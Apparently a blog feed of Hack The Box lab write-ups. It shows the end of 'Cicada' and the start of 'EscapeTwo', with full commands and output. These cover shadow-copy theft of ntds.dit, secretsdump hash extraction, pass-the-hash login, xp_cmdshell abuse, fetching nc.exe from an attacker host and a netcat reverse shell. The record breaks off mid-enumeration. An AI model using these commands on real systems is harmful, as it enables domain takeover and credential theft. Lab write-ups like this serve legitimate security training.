c:\windows\temp\diskshadow.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: CICADA-DC, 6/5/2025 4:31:11 PM -> set context persistent nowriters -> add volume c: alias temp -> create Alias temp for shadow ID {2092a9c7-6030-4242-ae48-eb9fcebe32e2} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {b49ed108-b5d4-4cb0-85b6-7f928242451d} set as environment variable. Querying all shadow copies with the shadow copy set ID {b49ed108-b5d4-4cb0-85b6-7f928242451d} * Shadow copy ID = {2092a9c7-6030-4242-ae48-eb9fcebe32e2} %temp% - Shadow copy set: {b49ed108-b5d4-4cb0-85b6-7f928242451d} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\] - Creation time: 6/5/2025 4:31:12 PM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: CICADA-DC.cicada.htb - Service machine: CICADA-DC.cicada.htb - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential Number of shadow copies listed: 1 -> expose %temp% z: -> %temp% = {2092a9c7-6030-4242-ae48-eb9fcebe32e2} The shadow copy was successfully exposed as z:\. -></code></pre></div> <p>Next, with the <code class="language-text">robocopy</code> utility, I made a copy of <code class="language-text">ntds.dit</code> from <code class="language-text">z</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> robocopy /B z:\Windows\NTDS .\ntds ntds.dit ------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows ------------------------------------------------------------------------------- Started : Thursday, June 5, 2025 4:32:20 PM Source : z:\Windows\NTDS\ Dest : C:\windows\temp\ntds\ Files : ntds.dit Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30 ------------------------------------------------------------------------------ New Dir 1 z:\Windows\NTDS\ New File 16.0 m ntds.dit &lt;...snip...> ------------------------------------------------------------------------------ Total Copied Skipped Mismatch FAILED Extras Dirs : 1 1 0 0 0 0 Files : 1 1 0 0 0 0 Bytes : 16.00 m 16.00 m 0 0 0 0 Times : 0:00:00 0:00:00 0:00:00 0:00:00 Speed : 82,646,384 Bytes/sec. Speed : 4,729.064 MegaBytes/min. Ended : Thursday, June 5, 2025 4:32:20 PM</code></pre></div> <p>Membership in the <code class="language-text">Backup Operators</code> group allows copying registry hives using the <code class="language-text">reg</code> command. So I used it to copy the <code class="language-text">SYSTEM</code> hive:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> reg save HKLM\SYSTEM SYSTEM The operation completed successfully.</code></pre></div> <p>Then, I downloaded <code class="language-text">ntds.dit</code> and <code class="language-text">SYSTEM</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> download ntds/ntds.dit Info: Downloading C:\windows\temp\ntds/ntds.dit to ntds.dit Info: Download successful! *Evil-WinRM* PS C:\windows\temp> download SYSTEM Info: Downloading C:\windows\temp\SYSTEM to SYSTEM Info: Download successful!</code></pre></div> <p>Using <code class="language-text">impacket-secretsdump</code> with <code class="language-text">ntds.dit</code> and <code class="language-text">SYSTEM</code>, I was able to extract user NTLM hashes:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL Impacket v0.11.0 - Copyright 2023 Fortra [*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: &lt;...snip...></code></pre></div> <p>With the hash of the <code class="language-text">administrator</code>, I obtained a shell over WinRM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami cicada\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> ls Directory: C:\Users\Administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 6/5/2025 4:22 PM 34 root.txt</code></pre></div>https://mgarrity.com/hack-the-box-escapetwo/https://mgarrity.com/hack-the-box-escapetwo/Sat, 15 Mar 2025 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/bbed798e1d7c174c29907285dc45c16e/3b67f/escapetwo.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/klEQVR42p2S3UoCQRiG9xJ2Wf/zJ10i3NEtEiNa9CDTEsVYMwzCCKoDNdGzvYzuo9Mu8HHGAjtwd8mDjxmYmYfn+97RYjlBYOUF5oFAT9qYWUE8H3L3t7SgA/VYT9kkiwKrViUhVyMVDdWCYIaEHZ+fMJy5DF4uGX00OKo7GOlw6E6gai9xKHhcNbntu3Rv2nijNveLC+KFCrHsP4A/doLSWZWnRYte74qv70+8YYeHaYPiqbK0Ay13z1AFIA3HyyZvszvmywnvc4/xyt0EtdcMVSBWzWHit3j1uzz711jSOswuMmUVjJkrU3Aqcq5l9LTYz/AvVJWZ2e6j/uEa/fYDZCkVAcsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="EscapeTwo" title="" src="/static/bbed798e1d7c174c29907285dc45c16e/50637/escapetwo.png" srcset="/static/bbed798e1d7c174c29907285dc45c16e/dda05/escapetwo.png 158w, /static/bbed798e1d7c174c29907285dc45c16e/679a3/escapetwo.png 315w, /static/bbed798e1d7c174c29907285dc45c16e/50637/escapetwo.png 630w, /static/bbed798e1d7c174c29907285dc45c16e/fddb0/escapetwo.png 945w, /static/bbed798e1d7c174c29907285dc45c16e/3b67f/escapetwo.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>EscapeTwo is a Windows machine running Active Directory. The box starts with a set of given credentials, which can be used to enumerate SMB shares. One of these shares contains an XLSX file with credentials for the sysadmin on an MSSQL instance. Once logged in to the MSSQL server, <code class="language-text">xp_cmdshell</code> can be used to obtain a shell on the machine as <code class="language-text">sql_svc</code>, where the password for the user <code class="language-text">ryan</code> can be found within a SQL Server Express configuration file. Enumeration of the domain with BloodHound shows that <code class="language-text">ryan</code> has the WriteOwner permission over <code class="language-text">ca_svc</code>, a member of the <code class="language-text">Cert Publishers</code> group, which has the ability to publish certificates to the directory. This privilege can be leveraged to take over the <code class="language-text">ca_svc</code> account by changing its password. Further enumeration of Active Directory Certificate Services (AD CS) reveals a certificate template with an ESC4 vulnerability. The template’s properties can then be modified to enable an ESC1 escalation path, ultimately leading to a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ nmap -sC -sV -Pn -oA nmap/output 10.10.11.51 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-14 20:46 EDT Nmap scan report for sequel.htb (10.10.11.51) Host is up (0.049s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-14 18:37:36Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-03-14T18:39:07+00:00; -6h08m36s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-03-14T18:39:06+00:00; -6h08m37s from scanner time. | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-ntlm-info: | 10.10.11.51:1433: | Target_Name: SEQUEL | NetBIOS_Domain_Name: SEQUEL | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: sequel.htb | DNS_Computer_Name: DC01.sequel.htb | DNS_Tree_Name: sequel.htb |_ Product_Version: 10.0.17763 | ms-sql-info: | 10.10.11.51:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-03-14T18:27:51 |_Not valid after: 2055-03-14T18:27:51 |_ssl-date: 2025-03-14T18:39:07+00:00; -6h08m36s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-03-14T18:39:07+00:00; -6h08m36s from scanner time. | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-03-14T18:39:06+00:00; -6h08m37s from scanner time. Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -6h08m37s, deviation: 1s, median: -6h08m37s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-03-14T18:38:26 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 98.69 seconds</code></pre></div> <p>I added <code class="language-text">sequel.htb</code> and <code class="language-text">DC01.sequel.htb</code> to <code class="language-text">/etc/hosts</code>, then enumerated SMB shares with the provided credentials for the <code class="language-text">rose</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ netexec smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' --shares SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su SMB 10.10.11.51 445 DC01 [*] Enumerated shares SMB 10.10.11.51 445 DC01 Share Permissions Remark SMB 10.10.11.51 445 DC01 ----- ----------- ------ SMB 10.10.11.51 445 DC01 Accounting Department READ SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin SMB 10.10.11.51 445 DC01 C$ Default share SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share SMB 10.10.11.51 445 DC01 Users READ</code></pre></div> <p>Two shares were non-default: <code class="language-text">Accounting Department</code> and <code class="language-text">Users</code>. Next, I used <code class="language-text">netexec</code> to spider the readable shares:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ netexec smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' -M spider_plus SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su SPIDER_PLUS 10.10.11.51 445 DC01 [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.10.11.51 445 DC01 [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.10.11.51 445 DC01 [*] STATS_FLAG: True SPIDER_PLUS 10.10.11.51 445 DC01 [*] EXCLUDE_FILTER: ['print$', 'ipc$'] SPIDER_PLUS 10.10.11.51 445 DC01 [*] EXCLUDE_EXTS: ['ico', 'lnk'] SPIDER_PLUS 10.10.11.51 445 DC01 [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.10.11.51 445 DC01 [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus SMB 10.10.11.51 445 DC01 [*] Enumerated shares SMB 10.10.11.51 445 DC01 Share Permissions Remark SMB 10.10.11.51 445 DC01 ----- ----------- ------ SMB 10.10.11.51 445 DC01 Accounting Department READ SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin SMB 10.10.11.51 445 DC01 C$ Default share SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share SMB 10.10.11.51 445 DC01 Users READ SPIDER_PLUS 10.10.11.51 445 DC01 [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json". SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Shares: 7 (Accounting Department, ADMIN$, C$, IPC$, NETLOGON, SYSVOL, Users) SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Readable Shares: 5 (Accounting Department, IPC$, NETLOGON, SYSVOL, Users) SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.10.11.51 445 DC01 [*] Total folders found: 76 SPIDER_PLUS 10.10.11.51 445 DC01 [*] Total files found: 67 SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size average: 23.74 KB SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size min: 0 B SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size max: 512 KB</code></pre></div> <p>The <code class="language-text">Accounting Department</code> share looked interesting, as it contained two <code class="language-text">.xlsx</code> files:</p> <div class="gatsby-highlight" data-language="json"><pre class="language-json"><code class="language-json"><span class="token punctuation">{</span> <span class="token property">"Accounting Department"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"accounting_2024.xlsx"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"atime_epoch"</span><span class="token operator">:</span> <span class="token string">"2024-06-09 06:50:41"</span><span class="token punctuation">,</span> <span class="token property">"ctime_epoch"</span><span class="token operator">:</span> <span class="token string">"2024-06-09 05:45:02"</span><span class="token punctuation">,</span> <span class="token property">"mtime_epoch"</span><span class="token operator">:</span> <span class="token string">"2024-06-09 07:11:31"</span><span class="token punctuation">,</span> <span class="token property">"size"</span><span class="token operator">:</span> <span class="token string">"9.98 KB"</span> <span class="token punctuation">}</span><span class="token punctuation">,</span> <span class="token property">"accounts.xlsx"</span><span class="token operator">:</span> <span class="token punctuation">{</span> <span class="token property">"atime_epoch"</span><span class="token operator">:</span> <span class="token string">"2024-06-09 06:52:21"</span><span class="token punctuation">,</span> <span class="token property">"ctime_epoch"</span><span class="token operator">:</span> <span class="token string">"2024-06-09 06:52:07"</span><span class="token punctuation">,</span> <span class="token property">"mtime_epoch"</span><span class="token operator">:</span> <span class="token string">"2024-06-09 07:11:31"</span><span class="token punctuation">,</span> <span class="token property">"size"</span><span class="token operator">:</span> <span class="token string">"6.62 KB"</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span><span class="token punctuation">,</span></code></pre></div> <p>I downloaded the shares by adding the <code class="language-text">-o download_flag=true</code> option to the above <code class="language-text">netexec</code> command. Then, attempting to open <code class="language-text">accounts.xlsx</code> or <code class="language-text">extracted_accounts_xlsx</code> in Excel resulted in a warning message stating that the file cannot be opened because the format or extension is not valid. However, since <code class="language-text">.xlsx</code> files are essentially ZIP archives containing XML documents and other resources, the contents can be extracted. For example, I extracted the contents of <code class="language-text">accounts.xlsx</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/…/EscapeTwo/nxc_spider_plus/10.10.11.51/Accounting Department] └─$ unzip accounts.xlsx -d extracted_accounts_xlsx Archive: accounts.xlsx file #1: bad zipfile offset (local header sig): 0 inflating: extracted_accounts_xlsx/xl/workbook.xml inflating: extracted_accounts_xlsx/xl/theme/theme1.xml inflating: extracted_accounts_xlsx/xl/styles.xml inflating: extracted_accounts_xlsx/xl/worksheets/_rels/sheet1.xml.rels inflating: extracted_accounts_xlsx/xl/worksheets/sheet1.xml inflating: extracted_accounts_xlsx/xl/sharedStrings.xml inflating: extracted_accounts_xlsx/_rels/.rels inflating: extracted_accounts_xlsx/docProps/core.xml inflating: extracted_accounts_xlsx/docProps/app.xml inflating: extracted_accounts_xlsx/docProps/custom.xml inflating: extracted_accounts_xlsx/[Content_Types].xml </code></pre></div> <p>I found usernames and passwords in <code class="language-text">extracted_accounts_xlsx/xl/sharedStrings.xml</code>. Most notably, the credentials for the <code class="language-text">sa</code> user:</p> <div class="gatsby-highlight" data-language="xml"><pre class="language-xml"><code class="language-xml"><span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>sst</span> <span class="token attr-name">xmlns</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>http://schemas.openxmlformats.org/spreadsheetml/2006/main<span class="token punctuation">"</span></span> <span class="token attr-name">count</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>25<span class="token punctuation">"</span></span> <span class="token attr-name">uniqueCount</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>24<span class="token punctuation">"</span></span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>t</span> <span class="token attr-name"><span class="token namespace">xml:</span>space</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>preserve<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>First Name<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>t</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>t</span> <span class="token attr-name"><span class="token namespace">xml:</span>space</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>preserve<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>Last Name<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>t</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>t</span> <span class="token attr-name"><span class="token namespace">xml:</span>space</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>preserve<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>Email<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>t</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>t</span> <span class="token attr-name"><span class="token namespace">xml:</span>space</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>preserve<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>Username<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>t</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>t</span> <span class="token attr-name"><span class="token namespace">xml:</span>space</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>preserve<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>Password<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>t</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>...snip...</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>t</span> <span class="token attr-name"><span class="token namespace">xml:</span>space</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>preserve<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>sa@sequel.htb<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>t</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>t</span> <span class="token attr-name"><span class="token namespace">xml:</span>space</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>preserve<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>sa<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>t</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>t</span> <span class="token attr-name"><span class="token namespace">xml:</span>space</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>preserve<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>MSSQLP@ssw0rd!<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>t</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>si</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>sst</span><span class="token punctuation">></span></span></code></pre></div> <p>I used the credentials to log in to the MSSQL instance:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ impacket-mssqlclient sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51 Impacket v0.11.0 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (sa dbo@master)></code></pre></div> <p>The databases were all default:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (sa dbo@master)> SELECT name FROM sys.databases; name ------ master tempdb model msdb </code></pre></div> <p>Initially, when I tried to run <code class="language-text">xp_cmdshell</code>, it was blocked:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (sa dbo@master)> xp_cmdshell whoami [-] ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.</code></pre></div> <p>However, since the user was an admin, <code class="language-text">xp_cmdshell</code> could be enabled with <code class="language-text">enable_xp_cmdshell</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (sa dbo@master)> enable_xp_cmdshell [*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. [*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.</code></pre></div> <p>I was then able to run commands:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (sa dbo@master)> xp_cmdshell whoami output -------------- sequel\sql_svc NULL </code></pre></div> <p>At this point, since I had command execution, I started a local python web server and then transferred <code class="language-text">nc.exe</code> onto the machine to get a shell:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (sa dbo@master)> xp_cmdshell "powershell -c cd c:\programdata; wget 10.10.14.200:8000/nc.exe -o nc.exe" output ------ NULL </code></pre></div> <p>I started a listener with <code class="language-text">nc</code> and sent the shell:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (sa dbo@master)> xp_cmdshell "powershell -c cd c:\programdata; .\nc.exe -e cmd.exe 10.10.14.200 443"</code></pre></div> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">sql_svc</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EscapeTwo] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.200] from (UNKNOWN) [10.10.11.51] 50176 Microsoft Windows [Version 10.0.17763.6640] (c) 2018 Microsoft Corporation. All rights reserved. C:\programdata>whoami whoami sequel\sql_svc C:\programdata>hostname hostname DC01</code></pre></div> <p>Access was denied to the directories of other users on the box:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">C:\programdata>cd \users cd \users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is 3705-289D Directory of C:\Users 06/09/2024 06:42 AM &lt;DIR> . 06/09/2024 06:42 AM &lt;DIR> .. 12/25/2024 04:10 AM &lt;DIR> Administrator 06/09/2024 04:11 AM &lt;DIR> Public 06/09/2024 04:15 AM &lt;DIR> ryan 06/08/2024 04:16 PM &lt;DIR> sql_svc 0 File(s) 0 bytes 6 Dir(s) 3,796,779,008 bytes free C:\Users>cd Administrator cd Administrator Access is denied. C:\Users>cd ryan cd ryan Access is denied.</code></pre></div> <p>After further enumeration, I found an additional password within <code class="language-text">C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI</code> in the <code class="language-text">SQLSVCPASSWORD</code> field:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">C:\SQL2019\ExpressAdv_ENU>dir dir Volume in drive C has no label. Volume Serial Number is 3705-289D Directory of C:\SQL2019\ExpressAdv_ENU 01/03/2025 08:29 AM &lt;DIR> . 01/03/2025 08:29 AM &lt;DIR> .. 06/08/2024 03:07 PM &lt;DIR> 1033_ENU_LP 09/24/2019 10:03 PM 45 AUTORUN.INF 09/24/2019 10:03 PM 788 MEDIAINFO.XML 06/08/2024 03:07 PM 16 PackageId.dat 06/08/2024 03:07 PM &lt;DIR> redist 06/08/2024 03:07 PM &lt;DIR> resources 09/24/2019 10:03 PM 142,944 SETUP.EXE 09/24/2019 10:03 PM 486 SETUP.EXE.CONFIG 06/08/2024 03:07 PM 717 sql-Configuration.INI 09/24/2019 10:03 PM 249,448 SQLSETUPBOOTSTRAPPER.DLL 06/08/2024 03:07 PM &lt;DIR> x64 7 File(s) 394,444 bytes 6 Dir(s) 3,794,612,224 bytes free C:\SQL2019\ExpressAdv_ENU>type sql-Configuration.INI type sql-Configuration.INI 